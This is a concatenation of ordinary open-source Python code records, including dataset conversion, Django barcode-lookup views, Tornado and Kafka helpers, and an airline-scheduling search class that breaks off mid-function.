'{}_{}{}'.format(new_file_base, box_id, new_file_ext)\n # The absolute file path where we will store the image\n # Only used if an coco-style dataset is created\n out_file = os.path.join(COCO_OUTPUT_DIR, new_file_name)\n # Create the category directories if necessary\n os.makedirs(os.path.dirname(out_file), exist_ok=True)\n if not os.path.exists(out_file):\n try:\n img = np.array(Image.open(in_file))\n cropped_img = img[crop_box[0]:crop_box[2], crop_box[1]:crop_box[3]]\n Image.fromarray(cropped_img).save(out_file)\n except ValueError:\n continue\n except FileNotFoundError:\n continue\n else:\n # if COCO_OUTPUT_DIR is set, then we will only use the shape\n # of cropped_img in the following code. So instead of reading \n # cropped_img = np.array(Image.open(out_file))\n # we can speed everything up by reading only the size of the image\n cropped_img = np.zeros((3,) + Image.open(out_file).size).T\n else:\n out_file = TMP_IMAGE\n try:\n img = np.array(Image.open(in_file))\n cropped_img = img[crop_box[0]:crop_box[2], crop_box[1]:crop_box[3]]\n Image.fromarray(cropped_img).save(out_file)\n except ValueError:\n continue\n except FileNotFoundError:\n continue\n \n \n # Read the image\n if COCO_OUTPUT_DIR:\n # Add annotations to the appropriate json\n if is_train:\n cur_json = training_json\n cur_tfr_writer = training_tfr_writer\n else:\n cur_json = test_json\n cur_tfr_writer = test_tfr_writer\n cur_json['images'].append(dict(id=next_image_id,\n width=cropped_img.shape[1],\n height=cropped_img.shape[0],\n file_name=new_file_name,\n original_key=cur_image_id))\n cur_json['annotations'].append(dict(id=next_annotation_id,\n image_id=next_image_id,\n category_id=cur_json_cat_id))\n\n if TFRECORDS_OUTPUT_DIR:\n image_data = {}\n if COCO_OUTPUT_DIR:\n image_data['filename'] = out_file\n else:\n Image.fromarray(cropped_img).save(TMP_IMAGE)\n image_data['filename'] = TMP_IMAGE\n image_data['id'] = next_image_id\n\n image_data['class'] = {}\n image_data['class']['label'] = cur_json_cat_id\n image_data['class']['text'] = cur_cat_name\n\n # Propagate optional metadata to tfrecords\n image_data['height'] = cropped_img.shape[0]\n image_data['width'] = cropped_img.shape[1]\n\n cur_tfr_writer.add(image_data)\n if not COCO_OUTPUT_DIR:\n os.remove(TMP_IMAGE)\n\n next_annotation_id = next_annotation_id + 1\n next_image_id = next_image_id + 1\n\n\nif TFRECORDS_OUTPUT_DIR:\n training_tfr_writer.close()\n test_tfr_writer.close()\n\n label_map = []\n for cat in training_json['categories']:\n label_map += ['item {{name: \"{}\" id: {}}}\\n'.format(cat['name'], cat['id'])]\n with open(os.path.join(TFRECORDS_OUTPUT_DIR, 'label_map.pbtxt'), 'w') as f:\n f.write(''.join(label_map))\n\nif COCO_OUTPUT_DIR:\n # Write out COCO-style json files to the output directory\n with open(os.path.join(COCO_OUTPUT_DIR, 'train.json'), 'wt') as fi:\n json.dump(training_json, fi)\n with open(os.path.join(COCO_OUTPUT_DIR, 'test.json'), 'wt') as fi:\n json.dump(test_json, fi)\n\n# Write detections to file with pickle\nwith open(DETECTION_OUTPUT, 'wb') as f:\n pickle.dump(detections, f, pickle.HIGHEST_PROTOCOL)\n","sub_path":"data_management/databases/classification/make_classification_dataset.py","file_name":"make_classification_dataset.py","file_ext":"py","file_size_in_byte":19953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"145495761","text":"from StackEx import *\n\n# Creates a ranking of users for each tag\n\nfilepath = 'example_data/Posts.xml'\n\npost_data = load_xml(filepath,'posts')\npost_data.Tags = post_data.Tags = to_tag_list(post_data)\npost_data['FixedNames'] = fix_names(post_data)\ntags = all_tags(post_data)\nquestiontags_dict = question_tags(post_data)\nuser_tag_score_dict = user_tag_scores(post_data,questiontags_dict)\ntag_sums = tag_sum(user_tag_score_dict) # got the totals\nwith open('tag_sums.txt','w') as f:\n for tag, scores in tag_sums.iteritems():\n f.write(tag+':\\n')\n c=0\n for x in scores:\n if c>10:\n break\n f.write(str(x)+'\\n')\n c+=1\n f.write('\\n')\n","sub_path":"Tag_sums.py","file_name":"Tag_sums.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"475090942","text":"# Author : R Hariharan\n\n# Contains all the parameters with respect the biped\n\n# Right & Left leg link lengths\nRIGHT_LEG_LINK_LEN = [0,0,0,0,0]\nLEFT_LEG_LINK_LEN = [0,0,0,0,0]\n\n#Distance between the two legs\nDISTANCE_BW_LEGS = 0\nHALF_DIST_BW_LEGS = 0\n\t\ndef setRobotParameters(distanceBwLegs, rightLegLinkLen = [], leftLegLinkLen = []):\n\tglobal HALF_DIST_BW_LEGS, DISTANCE_BW_LEGS, RIGHT_LEG_LINK_LEN, LEFT_LEG_LINK_LEN\n\tDISTANCE_BW_LEGS = distanceBwLegs\n\tHALF_DIST_BW_LEGS = distanceBwLegs/2\n\tRIGHT_LEG_LINK_LEN = rightLegLinkLen\n\tLEFT_LEG_LINK_LEN = leftLegLinkLen\n\ndef checkRobotParametersSet():\n\tif DISTANCE_BW_LEGS == 0:\n\t\treturn False\n\tif all(x == 0 for x in RIGHT_LEG_LINK_LEN):\n\t\treturn False\n\tif all(x == 0 for x in LEFT_LEG_LINK_LEN):\n\t\treturn False\n\treturn True","sub_path":"Code/servo_test/scripts/hari/robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"420039959","text":"from rest_framework_simplejwt.views import TokenObtainPairView\nfrom rest_framework import permissions, status\nfrom rest_framework.response import Response\nfrom .serializers import ProductSerializer, FileSerializer, \\\n TokenObtainSerializer, UserSerializer\nfrom .models import Product, Post\nfrom rest_framework.views import APIView\nfrom rest_framework.parsers import MultiPartParser, FormParser\nfrom cv2 import cvtColor, imread, COLOR_RGB2BGR\nfrom pyzbar.pyzbar import decode, ZBarSymbol\nfrom os import path, mkdir\nfrom numpy import array\nfrom PIL import Image\nfrom cairosvg import svg2png\nfrom io import BytesIO\nfrom rest_framework_simplejwt.tokens import RefreshToken\n\n\n# Класс отвечающий за вывод данных продукта через ручной ввод\nclass ProductTextCode(APIView):\n permission_classes = (permissions.AllowAny,)\n\n def post(self, request, *args, **kwargs):\n product_data = Product.objects.filter(vendor_code=request.data['vendor_code'][7:12])\n if product_data.exists():\n flag = self.CheckDigitCheck(request.data['vendor_code'])\n if flag == True:\n product_date_seriali = ProductSerializer(product_data, many=True)\n return Response(product_date_seriali.data)\n elif flag == False:\n return Response(data={\"err\": \"Штрих код не подлинный\"},\n status=status.HTTP_200_OK)\n else:\n return Response(data={\"err\": \"Такого товара нету в базе\"},\n status=status.HTTP_200_OK)\n\n\n # Метод отвечающий за проверку штрих кода на подлинность\n def CheckDigitCheck(self, num):\n one_step = sum([int(i) for k, i in enumerate(num, start=1) if not k % 2])\n two_step = one_step * 3\n three_step = sum([int(i) for k, i in enumerate(num, start=1) if k % 2 and k < 13])\n four_step = two_step + three_step\n final = 10 - int(str(four_step)[-1:])\n if num[12:] == str(final):\n flag = True\n return flag\n else:\n flag = False\n return flag\n\n\n# Класс отвечающий за вывод данных продукта через изображение\nclass ProductCode(APIView):\n parser_classes = (MultiPartParser, FormParser)\n\n def post(self, request, *args, **kwargs):\n posts_serializer = FileSerializer(data=request.data)\n if posts_serializer.is_valid():\n posts_serializer.save()\n # Тут производиться подмена ответа post запроса при загрузки изображения\n # Ответ на запрос будет информация о товаре\n # -----------------------------------------------------------------------\n serializer = FileSerializer(Post.objects.all(), many=True)\n path_file = serializer.data[0]['cover']\n code = self.Decoder_barcode(path_file[1:])\n product = Product.objects.filter(vendor_code=code.decode('utf-8')[7:12])\n\n if product.exists():\n product_date = ProductSerializer(product, many=True)\n Post.objects.all().delete()\n return Response(product_date.data)\n else:\n Post.objects.all().delete()\n return Response(data={\"err\": \"Такого товара нету в базе\"},\n status=status.HTTP_200_OK)\n # ----------------------------------------------------------------------------\n else:\n return Response(posts_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n # Метод отвечающий за распознование штрих кода.\n # Этот метод использунт возможности бибилиотеки pyzbar и opencv\n def Decoder_barcode(self, filename):\n\n if not path.exists('images'):\n mkdir('images/')\n\n files, file_extension = path.splitext(filename)\n # Если приходит файл формата .svg\n # то используем библиотеки PIL и cairosvg для перевода\n # изображения в удобный для opencv формат\n # -----------------------------------------------------------------\n if file_extension == '.svg':\n\n with open(filename, 'r') as file:\n svg = file.read()\n\n png = svg2png(bytestring=svg)\n pil_img = Image.open(BytesIO(png))\n image = cvtColor(array(pil_img), COLOR_RGB2BGR)\n # ------------------------------------------------------------------\n else:\n image = imread(filename)\n detectBarcode = decode(image, symbols=[ZBarSymbol.EAN13])\n\n for barcode in detectBarcode:\n return barcode.data\n\n\n# Класс отвечающий за выдачу токена при входе\nclass ObtainToken(TokenObtainPairView):\n permission_classes = (permissions.AllowAny,)\n serializer_class = TokenObtainSerializer\n\n\n# Класс отвечающий за создание пользователя\nclass CustomUserCreate(APIView):\n permission_classes = (permissions.AllowAny,)\n authentication_classes = ()\n\n def post(self, request, format='json'):\n serializer = UserSerializer(data=request.data)\n if serializer.is_valid():\n user = serializer.save()\n if user:\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n# Класс отправляющий сообщение при успешной авторизации\nclass Message(APIView):\n\n def get(self, request):\n return Response(data={\"hello\": \"Вы успешно вошли в сервис\"},\n status=status.HTTP_200_OK)\n\n\n# Класс отвечающий за занесение устаревших токенов в черный лист\nclass BlacklistToken(APIView):\n permission_classes = (permissions.AllowAny,)\n authentication_classes = ()\n\n def post(self, request):\n try:\n refresh_token = request.data[\"refresh_token\"]\n token = RefreshToken(refresh_token)\n token.blacklist()\n return Response(status=status.HTTP_205_RESET_CONTENT)\n except Exception as erro:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n","sub_path":"bakend/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"152639277","text":"#!/usr/bin/python\n\n#Test change#\n\nfrom jsonrpclib import Server\nfrom pprint import pprint as pp\n\nswitch = Server('http://jfurtak:arista123@192.168.56.10/command-api')\noutput = switch.runCmds(1, ['show version'])\npp(output[0]['systemMacAddress'])\nresult = switch.runCmds(1, ['enable',\n 'configure',\n 'interface Management1',\n \"description MAC: %s\" % output[0]\n['systemMacAddress']])\n","sub_path":"basic_eapi.py","file_name":"basic_eapi.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"337647191","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom swagger_server.models.base_model_ import Model\nfrom swagger_server import util\n\n\nclass Address(Model):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n def __init__(self, description: str=None, type: str=None, legacy_addr_id: str=None): # noqa: E501\n \"\"\"Address - a model defined in Swagger\n\n :param description: The description of this Address. # noqa: E501\n :type description: str\n :param type: The type of this Address. # noqa: E501\n :type type: str\n :param legacy_addr_id: The legacy_addr_id of this Address. # noqa: E501\n :type legacy_addr_id: str\n \"\"\"\n self.swagger_types = {\n 'description': str,\n 'type': str,\n 'legacy_addr_id': str\n }\n\n self.attribute_map = {\n 'description': 'description',\n 'type': 'type',\n 'legacy_addr_id': 'legacy_addr_id'\n }\n self._description = description\n self._type = type\n self._legacy_addr_id = legacy_addr_id\n\n @classmethod\n def from_dict(cls, dikt) -> 'Address':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The Address of this Address. # noqa: E501\n :rtype: Address\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def description(self) -> str:\n \"\"\"Gets the description of this Address.\n\n Full description of the address with its constituent parts combined. # noqa: E501\n\n :return: The description of this Address.\n :rtype: str\n \"\"\"\n return self._description\n\n @description.setter\n def description(self, description: str):\n \"\"\"Sets the description of this Address.\n\n Full description of the address with its constituent parts combined. # noqa: E501\n\n :param description: The description of this Address.\n :type description: str\n \"\"\"\n if description is None:\n raise ValueError(\"Invalid value for `description`, must not be `None`\") # noqa: E501\n\n self._description = description\n\n @property\n def type(self) -> str:\n \"\"\"Gets the type of this Address.\n\n The type of address. # noqa: E501\n\n :return: The type of this Address.\n :rtype: str\n \"\"\"\n return self._type\n\n @type.setter\n def type(self, type: str):\n \"\"\"Sets the type of this Address.\n\n The type of address. # noqa: E501\n\n :param type: The type of this Address.\n :type type: str\n \"\"\"\n allowed_values = [\"uk\", \"foreign\", \"bfpo\", \"dx\", \"electronic\", \"unknown\"] # noqa: E501\n if type not in allowed_values:\n raise ValueError(\n \"Invalid value for `type` ({0}), must be one of {1}\"\n .format(type, allowed_values)\n )\n\n self._type = type\n\n @property\n def legacy_addr_id(self) -> str:\n \"\"\"Gets the legacy_addr_id of this Address.\n\n The legacy identifier for the address. # noqa: E501\n\n :return: The legacy_addr_id of this Address.\n :rtype: str\n \"\"\"\n return self._legacy_addr_id\n\n @legacy_addr_id.setter\n def legacy_addr_id(self, legacy_addr_id: str):\n \"\"\"Sets the legacy_addr_id of this Address.\n\n The legacy identifier for the address. # noqa: E501\n\n :param legacy_addr_id: The legacy_addr_id of this Address.\n :type legacy_addr_id: str\n \"\"\"\n if legacy_addr_id is None:\n raise ValueError(\"Invalid value for `legacy_addr_id`, must not be `None`\") # noqa: E501\n\n self._legacy_addr_id = legacy_addr_id\n","sub_path":"server/swagger_server/models/address.py","file_name":"address.py","file_ext":"py","file_size_in_byte":3895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"270508859","text":"from tastypie import fields\nfrom tastypie.resources import ModelResource, ALL, ALL_WITH_RELATIONS\nfrom api.models import Decision, Citation, Paragraph\n\nclass DecisionResource(ModelResource):\n class Meta:\n # object_list = Decision.objects.filter(canlii_id = \"2001scc2\")\n queryset = Decision.objects.all()\n resource_name = 'decision'\n filtering = {\n 'canlii_id' : ALL\n }\n\n# http://127.0.0.1:8000/api/paragraph/citation__decision__id=1\n\nclass CitationResource(ModelResource):\n # cited_case_id = fields.ForeignKey(DecisionResource, 'cited_case_id')\n class Meta:\n # object_list = Decision.objects.filter(canlii_id = \"2001scc2\")\n queryset = Citation.objects.all()\n resource_name = 'citation'\n filtering = {\n 'cited_case_id' : ALL_WITH_RELATIONS\n }\n\n\nclass ParagraphResource(ModelResource):\n citation_id = fields.ForeignKey(CitationResource, 'citation_id')\n sentscore = fields.DecimalField(readonly=True)\n class Meta:\n # object_list = Decision.objects.filter(canlii_id = \"2001scc2\")\n # input_canlii_id = '2001scc2'\n queryset = Paragraph.objects.all()\n # queryset = Paragraph.objects.all().filter(citation_id = Citation.objects.all().filter(cited_case_id = Decision.objects.get(canlii_id = input_canlii_id)))\n resource_name = 'paragraph'\n\n filtering = {\n 'cited_paragraph' : ALL_WITH_RELATIONS\n }\n\n # def dehydrate_sentscore(self, bundle):\n # average_score = 0.0\n # for para in bundle.obj.sentiment_score.all():\n # average_score = 10000.000\n # return average_score\n\n\n # choose field names to include\n # fields = ['cited_paragraph', 'sentiment_score']\n\n\n # # http://django-tastypie.readthedocs.org/en/latest/resources.html#alter-list-data-to-serialize\n # def alter_list_data_to_serialize(self, request, data):\n # if request.GET.get('meta_only'):\n # return {'meta': data['meta']}\n # return data\n\n# # Create your models here.\n\n# class Decision(models.Model):\n# case_id_canlii = models.CharField(max_length = 100)\n# case_name = models.CharField(max_length = 500)\n# case_neutral_citation = models.CharField(max_length = 100)\n\n# def __str__(self):\n# return self.case_name\n\n# class Citation(models.Model):\n# cited_case_id = models.ForeignKey(Decision, related_name=\"cited_case\", on_delete = models.PROTECT)\n# citing_case_id = models.ForeignKey(Decision, related_name=\"citing_case\", on_delete = models.PROTECT)\n\n# def __str__(self):\n# return self.cited_case_id.case_name + \" \" + self.citing_case_id.case_name\n\n# class Paragraph(models.Model):\n# citing_case_id = models.ForeignKey(Citation, on_delete = models.PROTECT)\n# cited_paragraph = models.PositiveIntegerField()\n# citing_paragraph = models.PositiveIntegerField()\n\n# def __str__(self):\n# return self.cited_paragraph","sub_path":"DjangoAPIv2/api/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"242188102","text":"# installer for Met Watch\n# Copyright 2016 Chris Davies\n\nfrom setup import ExtensionInstaller\n\ndef loader():\n\treturn MetWatchInstaller()\n\nclass MetWatchInstaller(ExtensionInstaller):\n\tdef __init__(self):\n\t\tsuper(MetWatchInstaller, self).__init__(\n\t\t\tversion='0.1',\n\t\t\tname='metwatch',\n\t\t\tdescription='Uses an RSS Feed from the Met Office to provide template variables to alert to possible weather alerts',\n\t\t\tauthor='Chris Davies',\n\t\t\tauthor_email='weewx@davies-barnard.co.uk',\n\t\t\tconfig={\n\t\t\t\t'StdReport': {\n\t\t\t\t\t\t'metwatch': {\n\t\t\t\t\t\t\t\t'url' : 'http://www.metoffice.gov.uk/public/data/PWSCache/WarningsRSS/Region/sw',\n\t\t\t\t\t\t\t\t'skin': 'metwatch',\n\t\t\t\t\t\t\t\t'HTML_ROOT': 'metwatch'\n\t\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t},\n\t\t\tfiles=[\n\t\t\t\t('bin/user', ['bin/user/metwatch.py']),\n\t\t\t\t('skins/metwatch', ['skins/metwatch/skin.conf', 'skins/metwatch/index.html.tmpl']),\n\t\t\t]\n\t\t)","sub_path":"install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"228820607","text":"from django.forms import ModelForm\nfrom newsapp import models\nfrom django import forms\nfrom django.contrib.auth.models import User\n\n#\n# class UserProfileForm(forms.Form):\n# '''用戶信息表 修改表單'''\n#\n# name = forms.CharField(max_length=100)\n# user = forms.ModelMultipleChoiceField(queryset=models.User.objects.all())\n\n\nclass EmailMasterForm(ModelForm):\n '''Email Master 管理表'''\n\n class Meta:\n model = models.EmailMaster\n fields = '__all__'\n\nclass TGMasterForm(ModelForm):\n '''TG Master 管理表'''\n\n class Meta:\n model = models.TelegramMaster\n fields = '__all__'\n\nclass UserForm(ModelForm):\n '''用戶表 修改表單'''\n\n class Meta:\n model = User\n fields = (\n \"email\",\n )\n\n\nclass UserProfileForm(ModelForm):\n '''用戶信息表 修改表單'''\n\n class Meta:\n model = models.UserProfile\n fields = (\n \"name\",\n )\n\n\n\n\nclass SourseAddForm(ModelForm):\n '''Sourse 新增表單'''\n\n class Meta:\n model = models.Source\n fields = ('name', 'url', 'category')\n\n\nclass SourseForm(ModelForm):\n '''Source 修改表單'''\n\n def __init__(self, *args, **kwargs):\n super(SourseForm, self).__init__(*args, **kwargs)\n # Making name required\n self.fields['timezone'].required = False\n\n class Meta:\n model = models.Source\n fields = '__all__'\n\n\nclass CategoryForm(ModelForm):\n class Meta:\n model = models.Category\n fields = '__all__'\n","sub_path":"WebNews/newsapp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"212790603","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n\"\"\" A helper to create a tornado service.\n\"\"\"\n\nimport json\nimport logging\n\nimport concurrent.futures\nimport tornado.web\n\nfrom angus.analytics import report\nimport angus.jobs\nimport angus.streams\n\nclass FakeGatewayRoot(tornado.web.RequestHandler):\n def initialize(self, *args, **kwargs):\n self.service_key = kwargs.pop('service_key')\n\n def get(self):\n self.write({\n \"services\": {\n self.service_key: {\n \"url\": \"/services/{}\".format(self.service_key)\n }\n }\n })\n\nclass FakeGatewayService(tornado.web.RequestHandler):\n def initialize(self, *args, **kwargs):\n self.service_key = kwargs.pop('service_key')\n self.version = kwargs.pop('version')\n\n def get(self):\n self.write({\n \"versions\": {\n \"1\": {\"url\": \"/services/{}/{}\".format(self.service_key, self.version)}\n }\n })\n\nclass Description(tornado.web.RequestHandler):\n \"\"\" Every services have a description endpoint.\n \"\"\"\n\n def initialize(self, *args, **kwargs):\n self.description = kwargs.pop('description')\n self.version = kwargs.pop('version')\n self.service_key = kwargs.pop('service_key')\n\n @report\n def get(self):\n public_url = \"%s://%s\" % (self.request.protocol, self.request.host)\n result = {\n \"description\": self.description,\n \"version\": self.version,\n \"url\": \"%s/sevices/%s/%s\" % (public_url,\n self.service_key,\n self.version),\n }\n\n self.write(json.dumps(result))\n\ndef wrap_computer(compute, threads):\n if threads == 0:\n return tornado.gen.coroutine(compute)\n\n executor = concurrent.futures.ThreadPoolExecutor(threads)\n @tornado.gen.coroutine\n def wrap_compute(*args, **kwargs):\n yield executor.submit(compute, *args, **kwargs)\n\n return wrap_compute\n\nclass Service(tornado.web.Application):\n \"\"\" Start a tornado server and configure it to run an angus\n service.\n \"\"\"\n\n def __init__(self, service_key, version,\n port,\n compute,\n resource_storage=None, threads=4,\n description=\"No description\"):\n\n self.logger = logging.getLogger(service_key)\n\n self.port = port\n\n self.queues = dict() # TODO: use celery\n\n conf = {\n 'service_key': service_key,\n 'resource_storage': resource_storage,\n 'version': version,\n 'compute': wrap_computer(compute, threads),\n 'description': description,\n 'streams': self.queues,\n }\n\n basename = \"/services/{}/{}\".format(service_key, version)\n\n super(Service, self).__init__([\n (r\"/services\", FakeGatewayRoot, conf),\n (r\"/services/{}\".format(service_key), FakeGatewayService, conf),\n (r\"{}/jobs/(.*)\".format(basename), angus.jobs.Job, conf),\n (r\"{}/jobs\".format(basename), angus.jobs.JobCollection, conf),\n (r\"{}/streams/(.*)/input\".format(basename), angus.streams.Input, conf),\n (r\"{}/streams/(.*)/output\".format(basename), angus.streams.Output, conf),\n (r\"{}/streams/(.*)\".format(basename), angus.streams.Stream, conf),\n (r\"{}/streams\".format(basename), angus.streams.Streams, conf),\n\n (r\"{}\".format(basename), Description, conf),\n\n ])\n\n def start(self):\n \"\"\" Run the service\n \"\"\"\n self.listen(self.port, xheaders=True)\n tornado.ioloop.IOLoop.instance().start()\n","sub_path":"angus/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":4472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"646148491","text":"class ShipmentHelper:\n\n @staticmethod\n def get_lowest_price(provider_pricing, package_size='S'):\n \"\"\" Gets smallest price from price list according to package size.\n :param provider_pricing:\n :param package_size:\n :return: string:\n \"\"\"\n prices = []\n for key, value in provider_pricing.items():\n for size, price in value.items():\n if size == package_size:\n prices.append(price)\n prices.sort()\n return prices[:1][0]\n\n @staticmethod\n def get_price(provider, size, data):\n \"\"\"\n Gets price from price list according to selected provider and package size.\n :param provider:\n :param size:\n :param data:\n :return: string:\n \"\"\"\n return float(data[provider][size])\n\n @staticmethod\n def read_file(file_path):\n \"\"\"Loops overs rows of data in file and puts each row to the list.\n :param file_path:\n :return: list:\n \"\"\"\n with open(file_path) as f:\n content = f.readlines()\n content = [x.strip() for x in content]\n return content\n\n @staticmethod\n def get_package_sizes(data):\n \"\"\"Gets all available package sizes\n :param data:\n :return: list:\n \"\"\"\n sizes = []\n for key, value in data.items():\n for size, price in value.items():\n if size not in sizes:\n sizes.append(size)\n return sizes\n\n @staticmethod\n def get_providers(data):\n \"\"\"Gets all providers. In this context we do not care if they unique.\n :param data:\n :return: list:\n \"\"\"\n return [key for key, value in data.items()]\n\n","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"215027571","text":"import kafka_stream.kafka_consumer as c\nimport time\nfrom kafka_stream.utils import argument_parser\nfrom kafka_stream.utils import get_logger\n\n\ndef write_to_file(chunk, file_name):\n \"\"\"Write consumed messages in a file.\"\"\"\n with open(file_name, 'w') as file:\n for item in chunk:\n file.write(str(item.value))\n\n\nif __name__ == '__main__':\n\n parser = argument_parser()\n args = parser.parse_args()\n logger = get_logger('write to file')\n\n consumer = c.create_consumer(args.topic, args.server)\n chunks = c.chunks(consumer, args.count)\n\n for chunk in chunks:\n write_to_file(chunk, args.file+str(time.time()))\n logger.info(\"new file created..\")\n","sub_path":"src/kafka_stream/consumer_write_file.py","file_name":"consumer_write_file.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"531240789","text":"from voximplant.apiclient import VoximplantAPI, VoximplantException\nimport pytz\nimport datetime\n\nif __name__ == \"__main__\":\n voxapi = VoximplantAPI(\"credentials.json\")\n\n # Get statistics for all queues from the specified date\n\n FROM_DATE = datetime.datetime(2017, 1, 1, 0, 0, 0, pytz.utc)\n \n try:\n res = voxapi.get_acd_queue_statistics(FROM_DATE)\n except VoximplantException as e:\n print(\"Error: {}\".format(e.message))\n print(res)\n","sub_path":"samples/get_acd_queue_statistics.py","file_name":"get_acd_queue_statistics.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"320503588","text":"#!/usr/bin/env python3.6\n\nLOCATION = 0\nTIME = 1\nLEGS = 2\n\nfrom aimapython.search import astar_search\nfrom aimapython.search import EightPuzzle\nfrom aimapython.search import Problem\nimport sys\n\n\nclass Legs:\n #profit_list = [] #make some sort of dictionary or tuple?\n #class_list = []\n\n def __init__(self, leg, id):\n self.id = id #is the id needed?\n self.dep_airport = leg[1]\n self.arr_airport = leg[2]\n self.dur = leg[3]\n\n self.profits = { leg[i]:leg[i+1] for i in range(len(leg)) if i >= 4 and i%2 == 0 }\n print(self.profits)\n \"\"\"index = 0\n for fields in leg:\n if index >= 4 and index%2 == 0:\n self.class_list.append(fields[index])\n self.profit_list.append(fields[index+1])\n index=index+1\"\"\"\n\n def get_dur(self):\n return self.dur\n\n def get_arr_airport(self):\n return self.arr_airport\n\n def get_dep_airport(self):\n return self.dep_airport\n\n def get_profit(self, c):\n return self.profits[c]\n\n def get_max_profit(self):\n inverse = [(value, key) for key, value in self.profits.items()]\n return max(inverse)[0]\n\n def get_id(self):\n return self.id\n\n\nclass Airplane:\n\n def __init__(self, plane, id):\n self.id = id\n self.name = plane[1]\n self.c = plane[2]\n\n def get_class(self):\n return self.c\n\n def get_id(self):\n return self.id\n\n def get_name(self):\n return self.name\n\n\nclass ASARProblem(Problem):\n\n def __init__(self, filename):\n #self.initial = # place here the initial state (or None)\n fh = open(filename)\n [A, P, L, C] = self.load(fh)\n\n self.airClasses = {C[i][1] : C[i][2] for i in range(len(C))}\n\n self.airports = {A[i][1]: (A[i][2], A[i][3]) for i in range(len(A))} # verificar closing>opening???\n\n self.legs = [Legs(L[i], i) for i in range(0, len(L))]\n self.planes = [Airplane(P[i], i) for i in range(0, len(P))]\n\n self.n_planes = len(self.planes)\n\n needed_info = [[-1 for p in range(len(P))], [0 for p in range(len(P))], [() for i in range(len(P))]]\n initial = (tuple([l.get_id() for l in self.legs]), tuple(tuple(i) for i in needed_info))\n #initial = state([l.get_id() for l in self.legs], [p.get_location() for p in planes])\n\n Problem.__init__(self, initial)\n\n def actions(self, state):\n # possible actions consist of applying a leg to a given plane\n possible_actions = [[p, l] for p in range(len(self.planes)) for l in state[0]]\n\n for action in possible_actions:\n # pode-se otimizar fazendo pre-processamento\n p = action[0]\n l = action[1]\n s = len(state[1][LEGS][p])\n\n if s == 0:\n pass\n # tem de começar onde o avião está\n else:\n last_leg = int(state[1][LEGS][p][s-1])\n if self.legs[last_leg].get_arr_airport() != self.legs[l].get_dep_airport():\n possible_actions.remove(action)\n continue\n\n # parte a uma hora em que o departure airport já abriu\n \"\"\"apt = self.legs[action[1]].get_dep_airport()\n if self.planes[action[0]].get_time() < self.airports[apt][0]:\n possible_actions.remove(action)\n continue\n \"\"\"\n #chega a uma hora em que o arrival airport já abriu\n \"\"\"apt = self.legs[action[1]].get_arr_airport()\n if self.planes[action[0]].get_time() + self.legs[action[1]].get_dur() < self.airports[apt][0]:\n possible_actions.remove(action)\n continue\n \"\"\"\n # parte a uma hora em que o departure airport ainda não fechou\n apt = self.legs[action[1]].get_dep_airport()\n\n if state[1][TIME][p] > self.airports[apt][1]:\n possible_actions.remove(action)\n continue\n\n #chega a uma hora em que o arrival airport ainda não fechou\n apt = self.legs[action[1]].get_arr_airport()\n if state[1][1][p] + self.legs[action[1]].get_dur() > self.airports[apt][1]:\n possible_actions.remove(action)\n continue\n\n return possible_actions\n\n def result(self, state, action):\n print(\"Current state: \", state)\n #print(self.airClasses)\n #new_state = [list(state[0]), [list(state[1][0]), list(state[1][1]), [list(state[1][2][i]) for i in range(len(state[1][2]))]]]\n new_state = [list(state[0]), [list(state[1][0]), list(state[1][1]), [list(state[1][2][0]), list(state[1][2][1])]]]\n print(\"New state: \", 